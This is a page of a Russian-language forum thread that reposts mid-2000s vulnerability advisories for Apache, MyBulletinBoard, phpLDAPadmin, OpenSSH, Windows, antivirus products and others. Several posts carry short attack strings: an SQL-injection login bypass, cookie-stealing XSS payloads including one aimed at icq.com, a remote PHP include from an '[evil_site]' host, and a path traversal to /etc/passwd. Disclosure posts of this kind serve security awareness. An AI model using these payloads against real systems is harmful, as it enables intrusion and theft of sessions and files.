+ Ответить в теме
Страница 3 из 10 ПерваяПервая 1 2 3 4 5 6 7 ... ПоследняяПоследняя
Показано с 41 по 60 из 184

Тема: BugTraq

  1. #41
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Филип Снипп (Filip Sneppe) обнаружил уязвимость в популярном веб-сервере Apache 2.0.x. Уязвимость заключается в израсходовании всей выделенной виртуальной памяти и своп-файла в результате HTTP запроса с большим значением границы пересылаемого сегмента данных (byterange), при обращение злоумышленника к CGI скрипту, что приводит к "отказу от обслуживания" процесса веб-сервера. Уязвимость отсутствует в Apache 2.0(и предыдущих версиях), а также в следующих версиях после 2.0.54-r9.
    ASF Bugzilla
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  2. #42
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию SQL инъекция в MyBulletinBoard

    Программа: MyBulletinBoard 1.00 RC4

    Опасность: Средняя

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

    Уязвимость существует в сценарии /admin/index.php из-за недостаточной обработки входных данных в поле Username при выключенной опции magic_quotes_gpc. Удаленный пользователь может выполнить произвольные SQL команды в базе данных и получить административные привилегии в приложении. Примеры:

    Username: ' or 1=1 /*
    Password: blank

    member.php?action=login : username='[SQL INJECTION]

    polls.php?action=newpoll&tid=1&polloptions='[SQL INJECTION]

    search.php?action='[SQL Injection]

    member.php?action='[SQL Injection]

    Решение: Способов устранения уязвимости не существует в настоящее время.

  3. #43
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Повышение привилегий в Kaspersky Anti-Virus для Linux File Server

    Программа: Kaspersky Anti-Virus для Linux File Server 5.5-2. и более ранние версии

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет локальному пользователю повысить свои привилегии на системе.

    Программное обеспечение создает по умолчанию небезопасные права доступа для директории хранения лог файлов /var/log/kav/5.5/kav4unix/. Локальный пользователь может создать символическую ссылку с критического файла на системе и перезаписать его с привилегиями пользователя root.

    Решение: Установите последнюю версию (5.5-3) с сайта производителя.

  4. #44
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Межсайтовый скриптинг при обработке EXIF метаданных в различных галереях

    Программа:
    Coppermine Photo Gallery 1.3.3 и более ранние версии
    Gallery 1.5.1-RC2 и более ранние версии
    phpGraphy 0.9.9a и более ранние версии
    YaPiG 0.95 и более ранние версии
    PhotoPost PHP Pro

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

    Уязвимость существует при обработке EXIF метаданных. Удаленный пользователь может создать JPEG файл со специально сформированным EXIF (Exchangeable Image File) заголовком и выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример значения для параметра 'Camera Model Tag':

    <script>alert(document.cookie)</script>

    Решение: Установите последнюю версию с сайта производителя.

  5. #45
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Раскрытие информации в vBulletin в сценарии backup.php

    Программа: vBulletin 3.0

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю получить доступ к резервным копиям форума.

    Уязвимость существует в сценарии backup.php, который создает незащищенную паролем и не шифрованную резервную копию базы данных. Ели администратор во время резервного копирования помещает файл в каталог форума, удаленный пользователь может скачать его, угадав имя файла.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  6. #46
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Выполнение произвольного кода в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 6.0.2900.2180

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

    Удаленный пользователь может создать специально сформированную HTML страницу и вызвать отказ в обслуживании или выполнить произвольный код на целевой системе. Подробности не сообщаются.

    Решение: Способов устранения уязвимости не существует в настоящее время.

    Пример: http://security-protocols.com/upcoming/ie-xp-sp2-death.jpg

  7. #47
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Утечка памяти в Apache

    Программа: Apache 2.0.х

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

    Уязвимость существует в функции ap_byterange_filter() модуля 'modules/http/http_protocol.c'. Удаленный пользователь может послать CGI приложению специально сформированный HTTP запрос и вызвать отказ в обслуживании приложения.

    Решение: Установите исправление, доступное по SVN
    http://svn.apache.org/viewcvs.cgi?rev=239378&view=rev

  8. #48
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию PHP инклюдинг в phpLDAPadmin

    Программа: phpLDAPadmin 0.9.6 - 0.9.7/alpha5

    Опасность: Критическая

    Наличие эксплоита: Да

    Описание:
    Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.

    Уязвимость позволяет удаленному пользователю с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

    http: //[target]/[path]/phpldapadmin/welcome.php?
    custom_welcome_page=http ://[evil_site]/cmd.gif

    Удаленный пользователь может просмотреть произвольные файлы на системе с помощью символов обхода каталога. Пример:

    http: //[target]/[path]/phpldapadmin/welcome.php?
    custom_welcome_page=../../../../../../../../etc/passwd

    Удаленный пользователь может также выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  9. #49
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Некорректное отображение правил в Microsoft Windows Firewall

    Программа: Microsoft Windows XP, 2003

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет локальному пользователю с привилегиями администратора скрыть некоторые правила конфигурации межсетевого экрана.

    Пользовательский интерфейс встроенного в Microsoft Windows межсетевого экрана может некорректно отображать некоторые правила. Корректное отображение всех правил можно увидеть только с помощью консольной утилиты управления межсетевым экраном netsh firewall.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  10. #50
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Раскрытие информации в OpenSSH

    Удаленный пользователь может получить неавторизованный доступ к данным.

    Программа: OpenSSH версии до 4.2

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Обнаруженные уязвимости могут привести к неожиданной активации GatewayPorts и раскрытию аутентификационных данных GSSAPI.

    1. Уязвимость существует если явно не указан IP адрес для открытия динамического перенаправления портов (перенаправление с флагом -D), что может привести к некорректной активации GatewayPorts. Удаленный пользователь может подключиться к открытым портам на целевой системе.

    2. Данные GSSAPI могут быть делегированы пользователям, которые используют отличные от GSSAPI методы аутентификации. В результате удаленный пользователь может получить доступ к потенциально важным данным.

    Решение: Установите последнюю версию (4.2) с сайта производителя.

  11. #51
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию SQL-инъекция в WEB//NEWS

    Программа: WEB//NEWS 1.4

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды базе данных приложения.

    Уязвимость существует при обработке входных данных в параметре wn_userpw сценария modules/startup.php, параметрах cat, id и stof сценария include_this/news.php и параметре id сценария print.php. Удаленный пользователь может послать приложению специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения.

    Решение: Способов устранения уязвимости не существует в настоящее время.

  12. #52
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Переполнение буфера при обработке ARJ архивов в NOD32

    Программа: NOD32 nod32.002 version 1.033 build 1127

    Опасность:
    Критическая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

    Уязвимость существует из-за ошибки при обработке ARJ архивов, содержащих слишком длинные имена файлов. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.


    Решение:
    Установите исправление с сайта производителя.

  13. #53
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Выполнение произвольных команд в Mozilla Firefox

    Программа: Mozilla Firefox 1.0.6

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

    Уязвимость обнаружена в сценарии, который вызывается для обработки консольных команд, содержащихся в URL. Удаленный пользователь может заставить пользователя нажать на специально сформированную ссылку во внешнем приложении, которое использует Firefox в качестве браузера по умолчанию, и выполнить произвольные команды на системе с привилегиями текущего пользователя. Уязвимость существует только на Unix платформах.

    Решение: Установите последнюю версию с сайта производителя.

  14. #54
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Подмена вложений и межсайтовый скриптинг в Opera Mail Client

    Программа: Opera Mail Client версии до 8.50

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Удаленный пользователь может подменить имя вложенного файла и произвести XSS нападение.

    1. Прикрепленные файлы открываются без предупреждения в личной кеш-директории пользователя. Удаленный пользователь может выполнить произвольный JavaScript сценарий в контексте “file://”.

    2. Opera Mail определяет тип файла по заголовку "Content-Type". Удаленный пользователь может с помощью специально сформированного имени файла (содержащего точку в конце имени) заставить почтовый клиент определить HTML файл как изображение. Пример:

    image.jpg.

    Решение: Установите последнюю версию (8.50) с сайта производителя.

  15. #55
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Отказ в обслуживании в функции routing_ioctl() в ядре Linux

    Программа: Linux kernel версии до 2.6.13.2

    Опасность: Низкая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы.

    Локальный пользователь может создать большое количество вызовов функции fget(), что вызовет переполнение счетчика и последующий вызов функции fput() может освободить ошибочный ресурс. В результате возможет отказ в обслуживании системы.

    Решение:
    Установите исправленную версию с сайта производителя.

  16. #56
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию DoS через Win32k.sys против Microsoft Windows

    Событие WM_CLOSE для активного окна выпадающего меню приводит к краху системы.
    Затронутые продукты: MICROSOFT:Windows XP

    VULNERABILITY:
    file : win32k.sys
    version : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
    description : Multi-User Win32 Driver
    author : ******(6star aka mg)

    BUG DESCRIPTION:
    When you try

    HOW TO CHECK:
    1. Click on Desktop to call Context Menu.
    2. Then Select Sub Menu.
    3. Press CTRL
    4. See BSOD win win32k.sys at ADDR: BF920D1F

    EXAMPLE:
    1.Arrange Icons by
    2.Name
    3.Press CTRL
    4.
    Код:
            .BF920D10: C8FFEB12                     enter       0EBFF,012
            .BF920D14: 8B460C                       mov         eax,[esi][0C]
            .BF920D17: 093E                         or          [esi],edi
            .BF920D19: 8B80A4000000                 mov         eax,[eax][000000A4]
            .BF920D1F: 80480110                     or          b,[eax][01],010        <<-- BUG HERE
            .BF920D23: 33C0                         xor         eax,eax
            .BF920D25: 40                           inc         eax
            .BF920D26: 5F                           pop         edi
            .BF920D27: 5E                           pop         esi
            .BF920D28: 5D                           pop         ebp
            .BF920D29: C20400                       retn        00004

  17. #57
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    XSS-уязвимость на icq.com.
    Сама уязвимость:
    Код:
    http://www.icq.com/boards/search_results.php?uSearchString=<script>alert (document.cookie)</script>

  18. #58
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Переполнение буфера при обработке ARJ архивов в 7-Zip

    Программа: 7-Zip 3.13, 4.23, и 4.26 BETA

    Опасность: Высокая

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

    Удаленный пользователь может создать специально сформированный ARJ архив, содержащий ARJ блок длиной более 2600 байт, что вызовет переполнение буфера и позволит злоумышленнику выполнить произвольный код на целевой системе с привилегиями текущего пользователя.

    Решение: Установите последнюю версию (4.27 BETA) с сайта производителя.

  19. #59
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Выполнение скрытых HTTP запросов в Microsoft Internet Explorer

    Программа: Microsoft Internet Explorer 6.0

    Опасность: Средняя

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю произвести HTTP Request Smuggling атаку и получить доступ к потенциально важным данным жертвы.

    Уязвимость существует в функции open() в ActiveX компоненте Microsoft.XMLHTTP из-за недостаточной обработки входных данных. Удаленный пользователь может внедрить произвольный HTTP запрос с помощью специально сформированных данных, содержащих знак табуляции и символ новой строки.

    Решение: Способов устранения уязвимости не существует в настоящее время. В качестве временного решения рекомендуется включить высокий уровень безопасности браузера.

  20. #60
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию


    Оффтопик

    Я - за (с) Vanda
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

+ Ответить в теме
Страница 3 из 10 ПерваяПервая 1 2 3 4 5 6 7 ... ПоследняяПоследняя

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.